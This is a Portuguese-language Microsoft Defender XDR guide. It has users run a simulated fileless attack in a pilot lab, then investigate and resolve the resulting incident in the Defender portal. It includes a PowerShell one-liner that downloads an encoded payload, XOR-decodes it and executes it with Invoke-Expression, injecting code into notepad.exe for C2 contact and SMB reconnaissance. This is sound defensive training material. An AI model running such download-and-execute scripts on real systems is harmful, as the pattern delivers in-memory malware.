Executar uma simulação de ataque num ambiente piloto Microsoft Defender XDR

  • Artigo

Este artigo é o Passo 1 de 2 no processo de realização de uma investigação e resposta de um incidente no Microsoft Defender XDR através de um ambiente piloto. Para obter mais informações sobre este processo, veja o artigo de descrição geral .

Depois de preparar o ambiente piloto, está na altura de testar a resposta a incidentes do Microsoft Defender XDR e as capacidades automatizadas de investigação e remediação ao criar um incidente com um ataque simulado e ao utilizar o portal do Microsoft Defender para investigar e responder.

Um incidente no Microsoft Defender XDR é uma coleção de alertas correlacionados e dados associados que compõem a história de um ataque.

Os serviços e aplicações do Microsoft 365 criam alertas quando detetam um evento ou atividade suspeita ou maliciosa. Os alertas individuais fornecem pistas valiosas sobre um ataque concluído ou em curso. No entanto, os ataques normalmente utilizam várias técnicas em diferentes tipos de entidades, como dispositivos, utilizadores e caixas de correio. O resultado são vários alertas para múltiplas entidades no seu inquilino.

Nota

Se não estiver familiarizado com a análise de segurança e a resposta a incidentes, veja as instruções Responder ao seu primeiro incidente para obter uma visita guiada de um processo típico de análise, remediação e análise pós-incidente.

Simular ataques com o portal do Microsoft Defender

O portal Microsoft Defender tem capacidades incorporadas para criar ataques simulados no seu ambiente piloto:

Defender para Office 365 Formação em simulação de ataques

Defender para Office 365 com Microsoft 365 E5 ou Microsoft Defender para Office 365 Plano 2 inclui formação de simulação de ataques para ataques de phishing. Os passos básicos são:

  1. Create uma simulação

    Para obter instruções passo a passo sobre como criar e iniciar uma nova simulação, veja Simular um ataque de phishing.

  2. Create um payload

    Para obter instruções passo a passo sobre como criar um payload para utilização numa simulação, veja Create um payload personalizado para a preparação de simulação de ataques.

  3. Obter informações

    Para obter instruções passo a passo sobre como obter informações sobre relatórios, veja Obter informações através da preparação de simulação de ataques.

Para obter mais informações, veja Simulações.

Tutoriais de ataque do Defender para Endpoint & simulações

Eis as simulações do Defender para Endpoint da Microsoft:

  • Documento sai da porta dos fundos
  • Investigação automatizada (backdoor)

Existem simulações adicionais de origens de terceiros. Também existe um conjunto de tutoriais.

Para cada simulação ou tutorial:

  1. Transfira e leia o documento walk-through correspondente fornecido.

  2. Transfira o ficheiro de simulação. Pode optar por transferir o ficheiro ou script no dispositivo de teste, mas não é obrigatório.

  3. Execute o ficheiro ou script de simulação no dispositivo de teste, conforme indicado no documento de instruções.

Para obter mais informações, veja Experiência Microsoft Defender para Endpoint através de ataques simulados.

Simular um ataque com um controlador de domínio isolado e um dispositivo cliente (opcional)

Neste exercício opcional de resposta a incidentes, irá simular um ataque a um controlador de domínio isolado Active Directory Domain Services (AD DS) e dispositivo Windows com um script do PowerShell e, em seguida, investigar, remediar e resolver o incidente.

Primeiro, tem de adicionar pontos finais ao seu ambiente piloto.

Adicionar pontos finais de ambiente piloto

Primeiro, tem de adicionar um controlador de domínio do AD DS isolado e um dispositivo Windows ao seu ambiente piloto.

  1. Verifique se o inquilino do ambiente piloto ativou Microsoft Defender XDR.

  2. Verifique se o controlador de domínio:

  3. Verifique se o dispositivo de teste:

Se utilizar grupos de inquilinos e dispositivos, crie um grupo de dispositivos dedicado para o dispositivo de teste e envie-o para o nível superior.

Uma alternativa é alojar o controlador de domínio do AD DS e testar o dispositivo como máquinas virtuais nos serviços de infraestrutura do Microsoft Azure. Pode utilizar as instruções na Fase 1 do Guia do Laboratório de Teste da empresa simulada, mas ignore a criação da máquina virtual APP1.

Eis o resultado.

O ambiente de avaliação com o Guia do Laboratório de Teste empresarial simulado

Irá simular um ataque sofisticado que tira partido de técnicas avançadas para ocultar da deteção. O ataque enumera sessões SMB (Server Message Block) abertas em controladores de domínio e obtém endereços IP recentes dos dispositivos dos utilizadores. Normalmente, esta categoria de ataques não inclui ficheiros removidos no dispositivo da vítima e ocorrem apenas na memória. "Vivem fora da terra" através do sistema existente e das ferramentas administrativas e injetam o seu código em processos de sistema para ocultar a sua execução. Este comportamento permite-lhes evitar a deteção e persistir no dispositivo.

Nesta simulação, o nosso cenário de exemplo começa com um script do PowerShell. No mundo real, um utilizador pode ser enganado para executar um script ou o script pode ser executado a partir de uma ligação remota a outro computador a partir de um dispositivo anteriormente infetado, o que indica que o atacante está a tentar mover-se lateralmente na rede. A deteção destes scripts pode ser difícil porque, muitas vezes, os administradores também executam scripts remotamente para realizar várias atividades administrativas.

O ataque do PowerShell sem ficheiros com injeção de processos e ataque de reconhecimento SMB

Durante a simulação, o ataque injeta shellcode num processo aparentemente inocente. O cenário requer a utilização de notepad.exe. Escolhemos este processo para a simulação, mas é mais provável que os atacantes tenham como alvo um processo de sistema de execução prolongada, como svchost.exe. Em seguida, o shellcode entra em contacto com o servidor de comandos e controlo (C2) do atacante para receber instruções sobre como proceder. O script tenta executar consultas de reconhecimento no controlador de domínio (DC). O reconhecimento permite que um atacante obtenha informações sobre informações de início de sessão recentes do utilizador. Assim que os atacantes tiverem estas informações, podem mover-se lateralmente na rede para aceder a uma conta confidencial específica

Importante

Para obter os resultados ideais, siga as instruções de simulação de ataques o mais perto possível.

Executar a simulação de ataque do controlador de domínio do AD DS isolado

Para executar a simulação do cenário de ataque:

  1. Certifique-se de que o ambiente piloto inclui o controlador de domínio isolado do AD DS e o dispositivo Windows.

  2. Inicie sessão no dispositivo de teste com a conta de utilizador de teste.

  3. Abra uma janela Windows PowerShell no dispositivo de teste.

  4. Copie o seguinte script de simulação:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Nota

    Se abrir este artigo num browser, poderá ter problemas ao copiar o texto completo sem perder determinados carateres ou introduzir quebras de linha adicionais. Se for este o caso, transfira este documento e abra-o no Adobe Reader.

  5. Cole e execute o script copiado na janela do PowerShell.

Nota

Se estiver a executar o PowerShell com o protocolo RDP (Remote Desktop Protocol), utilize o comando Tipo de Texto da Área de Transferência no cliente RDP porque o método ctrl-V de tecla de atalho ou colar com o botão direito do rato pode não funcionar. Por vezes, as versões recentes do PowerShell também não aceitam esse método. Poderá ter de copiar primeiro para o Bloco de Notas na memória, copiá-lo na máquina virtual e, em seguida, colá-lo no PowerShell.

Alguns segundos depois, a aplicação Bloco de Notas será aberta. Será injetado um código de ataque simulado no Bloco de Notas. Mantenha a instância do Bloco de Notas gerada automaticamente aberta para experimentar o cenário completo.

O código de ataque simulado tentará comunicar com um endereço IP externo (simulando o servidor C2) e, em seguida, tentará o reconhecimento contra o controlador de domínio através de SMB.

Verá esta mensagem apresentada na consola do PowerShell quando este script for concluído:

ran NetSessionEnum against [DC Name] with return code result 0

Para ver a funcionalidade Incidente e Resposta Automatizada em ação, mantenha o processo de notepad.exe aberto. Verá Incidente Automatizado e Resposta parar o processo do Bloco de Notas.

Investigar o incidente do ataque simulado

Nota

Antes de guiá-lo nesta simulação, watch o seguinte vídeo para ver como a gestão de incidentes o ajuda a juntar os alertas relacionados como parte do processo de investigação, onde pode encontrá-lo no portal e como pode ajudá-lo nas suas operações de segurança:

Ao mudar para o ponto de vista do analista SOC, pode agora começar a investigar o ataque no portal Microsoft Defender.

  1. Abra o portal Microsoft Defender.

  2. No painel de navegação, selecione Incidentes & Incidentes > de Alertas.

  3. O novo incidente para o ataque simulado será apresentado na fila de incidentes.

    Um exemplo da fila Incidentes

Investigar o ataque como um único incidente

Microsoft Defender XDR correlaciona a análise e agrega todos os alertas e investigações relacionados de diferentes produtos numa entidade de incidente. Ao fazê-lo, Microsoft Defender XDR mostra uma história de ataque mais ampla, permitindo que o analista do SOC compreenda e responda a ameaças complexas.

Os alertas gerados durante esta simulação estão associados à mesma ameaça e, como resultado, são automaticamente agregados como um único incidente.

Para ver o incidente:

  1. Abra o portal Microsoft Defender.

  2. No painel de navegação, selecione Incidentes & Incidentes > de Alertas.

  3. Selecione o item mais recente ao clicar no círculo localizado à esquerda do nome do incidente. Um painel lateral apresenta informações adicionais sobre o incidente, incluindo todos os alertas relacionados. Cada incidente tem um nome exclusivo que o descreve com base nos atributos dos alertas que inclui.

    Os alertas apresentados no dashboard podem ser filtrados com base nos recursos do serviço: Microsoft Defender para Identidade, Microsoft Defender for Cloud Apps, Microsoft Defender para Endpoint, Microsoft Defender XDR e Microsoft Defender para Office 365.

  4. Selecione Abrir página de incidente para obter mais informações sobre o incidente.

    Na página Incidente , pode ver todos os alertas e informações relacionados com o incidente. As informações incluem as entidades e recursos envolvidos no alerta, a origem de deteção dos alertas (como Microsoft Defender para Identidade ou Microsoft Defender para Endpoint) e o motivo pelo qual foram ligados. A revisão da lista de alertas de incidentes mostra a progressão do ataque. Nesta vista, pode ver e investigar os alertas individuais.

    Também pode clicar em Gerir incidente no menu do lado direito, para marcar o incidente, atribuí-lo a si próprio e adicionar comentários.

Rever alertas gerados

Vejamos alguns dos alertas gerados durante o ataque simulado.

Nota

Iremos percorrer apenas alguns dos alertas gerados durante o ataque simulado. Dependendo da versão do Windows e dos produtos Microsoft Defender XDR em execução no seu dispositivo de teste, poderá ver mais alertas que aparecem por uma ordem ligeiramente diferente.

Um exemplo de um alerta gerado

Alerta: Injeção de processo suspeita observada (Origem: Microsoft Defender para Endpoint)

Os atacantes avançados utilizam métodos sofisticados e furtivos para persistir na memória e ocultar das ferramentas de deteção. Uma técnica comum é operar a partir de um processo de sistema fidedigno em vez de um executável malicioso, dificultando a deteção de ferramentas e operações de segurança para detetar o código malicioso.

Para permitir que os analistas do SOC detetem estes ataques avançados, os sensores de memória profunda no Microsoft Defender para Endpoint fornecem ao nosso serviço cloud visibilidade sem precedentes sobre uma variedade de técnicas de injeção de código entre processos. A figura seguinte mostra como o Defender para Endpoint detetou e alertou sobre a tentativa de injetar código nonotepad.exe.

Um exemplo do alerta para injeção de um código potencialmente malicioso

Alerta: Comportamento inesperado observado por uma execução de processo sem argumentos da linha de comandos (Origem: Microsoft Defender para Endpoint)

Microsoft Defender para Endpoint deteções visam frequentemente o atributo mais comum de uma técnica de ataque. Este método garante a durabilidade e eleva a barra para os atacantes mudarem para táticas mais recentes.

Utilizamos algoritmos de aprendizagem em grande escala para estabelecer o comportamento normal dos processos comuns numa organização e em todo o mundo e watch para quando estes processos mostram comportamentos anómalos. Estes comportamentos anómalos indicam frequentemente que o código estranho foi introduzido e está em execução num processo fidedigno de outra forma.

Neste cenário, o processo notepad.exe apresenta um comportamento anormal, envolvendo a comunicação com uma localização externa. Este resultado é independente do método específico utilizado para introduzir e executar o código malicioso.

Nota

Uma vez que este alerta se baseia em modelos de machine learning que requerem processamento de back-end adicional, poderá demorar algum tempo até ver este alerta no portal.

Tenha em atenção que os detalhes do alerta incluem o endereço IP externo , um indicador que pode utilizar como um pivô para expandir a investigação.

Selecione o endereço IP na árvore do processo de alerta para ver a página de detalhes do endereço IP.

Um exemplo de comportamento inesperado de uma execução de processo sem argumentos de linha de comandos

A figura seguinte apresenta a página de detalhes do Endereço IP selecionada (clicando no endereço IP na árvore de processos de alerta).

Um exemplo da página de detalhes do endereço IP

Alerta: Reconhecimento de endereços IP e utilizador (SMB) (Origem: Microsoft Defender para Identidade)

A enumeração com o protocolo SMB (Server Message Block) permite que os atacantes obtenham informações recentes de início de sessão do utilizador que os ajudam a mover-se lateralmente através da rede para aceder a uma conta confidencial específica.

Nesta deteção, é acionado um alerta quando a enumeração da sessão SMB é executada num controlador de domínio.

Um exemplo de alerta de Microsoft Defender para Identidade para reconhecimento de endereços IP e utilizadores

Reveja a linha cronológica do dispositivo com Microsoft Defender para Endpoint

Depois de explorar os vários alertas neste incidente, navegue de volta para a página de incidentes que investigou anteriormente. Selecione o separador Dispositivos na página do incidente para rever os dispositivos envolvidos neste incidente, conforme comunicado por Microsoft Defender para Endpoint e Microsoft Defender para Identidade.

Selecione o nome do dispositivo onde o ataque foi realizado para abrir a página de entidade desse dispositivo específico. Nessa página, pode ver alertas que foram acionados e eventos relacionados.

Selecione o separador Linha Cronológica para abrir a linha cronológica do dispositivo e ver todos os eventos e comportamentos observados no dispositivo por ordem cronológica, intercalados com os alertas gerados.

Um exemplo da linha cronológica do dispositivo com comportamentos

Expandir alguns dos comportamentos mais interessantes fornece detalhes úteis, como árvores de processos.

Por exemplo, desloque-se para baixo até encontrar o evento de alerta Injeção de processo suspeita observada. Selecione o powershell.exe injetado para notepad.exe evento de processo abaixo do mesmo, para apresentar a árvore de processos completa para este comportamento no gráfico Entidades de eventos no painel lateral. Utilize a barra de pesquisa para filtrar, se necessário.

Um exemplo da árvore de processos para o comportamento de criação de ficheiros do PowerShell selecionado

Reveja as informações do utilizador com Microsoft Defender for Cloud Apps

Na página do incidente, selecione o separador Utilizadores para apresentar a lista de utilizadores envolvidos no ataque. A tabela contém informações adicionais sobre cada utilizador, incluindo a classificação Prioridade de Investigação de cada utilizador.

Selecione o nome de utilizador para abrir a página de perfil do utilizador onde pode ser realizada uma investigação mais aprofundada. Leia mais sobre como investigar utilizadores de risco.

Página de utilizador do Defender para Cloud Apps

Investigação e remediação automatizadas

Nota

Antes de guiá-lo nesta simulação, watch o seguinte vídeo para se familiarizar com o que é a autorrecuperação automatizada, onde encontrá-la no portal e como pode ajudar nas suas operações de segurança:

Navegue de volta para o incidente no portal do Microsoft Defender. O separador Investigações na página Incidente mostra as investigações automatizadas que foram acionadas por Microsoft Defender para Identidade e Microsoft Defender para Endpoint. A captura de ecrã abaixo mostra apenas a investigação automatizada acionada pelo Defender para Endpoint. Por predefinição, o Defender para Endpoint remedia automaticamente os artefactos encontrados na fila, o que requer remediação.

Um exemplo das investigações automatizadas relacionadas com o incidente

Selecione o alerta que acionou uma investigação para abrir a página Detalhes da investigação . Verá os seguintes detalhes:

  • Alertas que acionaram a investigação automatizada.
  • Utilizadores e dispositivos afetados. Se forem encontrados indicadores em dispositivos adicionais, estes dispositivos adicionais também serão listados.
  • Lista de provas. As entidades encontradas e analisadas, como ficheiros, processos, serviços, controladores e endereços de rede. Estas entidades são analisadas quanto a possíveis relações com o alerta e classificadas como benignas ou maliciosas.
  • Foram encontradas ameaças. Ameaças conhecidas encontradas durante a investigação.

Nota

Dependendo da temporização, a investigação automatizada ainda pode estar em execução. Aguarde alguns minutos até que o processo seja concluído antes de recolher e analisar as provas e rever os resultados. Atualize a página Detalhes da investigação para obter as conclusões mais recentes.

Um exemplo da página Detalhes da investigação

Durante a investigação automatizada, Microsoft Defender para Endpoint identificou o processo de notepad.exe, que foi injetado como um dos artefactos que requerem remediação. O Defender para Endpoint para automaticamente a injeção de processos suspeitos como parte da remediação automatizada.

Pode ver notepad.exe desaparecer da lista de processos em execução no dispositivo de teste.

Resolver o incidente

Depois de concluída a investigação e confirmada para ser remediada, resolva o incidente.

Na página Incidente , selecione Gerir incidente. Defina o estado como Resolver incidente e selecione Verdadeiro alerta para a classificação e Teste de segurança para a determinação.

Um exemplo da página de incidentes com o painel gerir incidentes aberto, onde pode clicar no comutador para resolver o incidente

Quando o incidente é resolvido, resolve todos os alertas associados no portal do Microsoft Defender e nos portais relacionados.

Isto encapsula simulações de ataques para análise de incidentes, investigação automatizada e resolução de incidentes.

Passo seguinte

As capacidades de resposta a incidentes Microsoft Defender XDR

Passo 2 de 2: Experimente Microsoft Defender XDR capacidades de resposta a incidentes

Create o Ambiente de Avaliação Microsoft Defender XDR

Sugestão

Quer saber mais? Interaja com a comunidade do Microsoft Security na nossa Tech Community: Microsoft Defender XDR Tech Community.